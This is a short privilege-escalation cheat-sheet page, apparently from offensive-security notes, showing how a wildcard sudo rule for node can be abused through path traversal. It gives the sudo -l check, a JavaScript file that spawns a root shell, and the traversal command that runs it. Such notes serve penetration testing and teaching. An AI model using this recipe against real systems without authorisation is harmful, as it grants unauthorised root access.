Sudo Path Traversal Privilege Escalation

If some sudo command receives a file path, we might escalate to privileges using path traversal.

Investigation

sudo -l

(ALL) /usr/bin/node /usr/local/scripts/*.js
Copied!

If the file path uses wildcards, we may execute arbitrary files. In short, we can refer to files in different directories which the system owner unintended.

Exploitation

Assume we can execute ‘node’ command as root and js file. Create the “test.js” under /tmp, which spawns a root shell after executing ‘node’ command.

// /tmp/test.js
require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]})
Copied!

Now run ‘node’ command as root. We can pass the file using path traversal.

sudo /usr/bin/node /usr/local/scripts/../../../tmp/test.js

PreviousSudo OpenVPN Privilege Escalation NextSudo Privilege Escalation

Last updated 2 years ago

hashtagInvestigationarrow-up-right

hashtagExploitationarrow-up-right

Investigation

Exploitation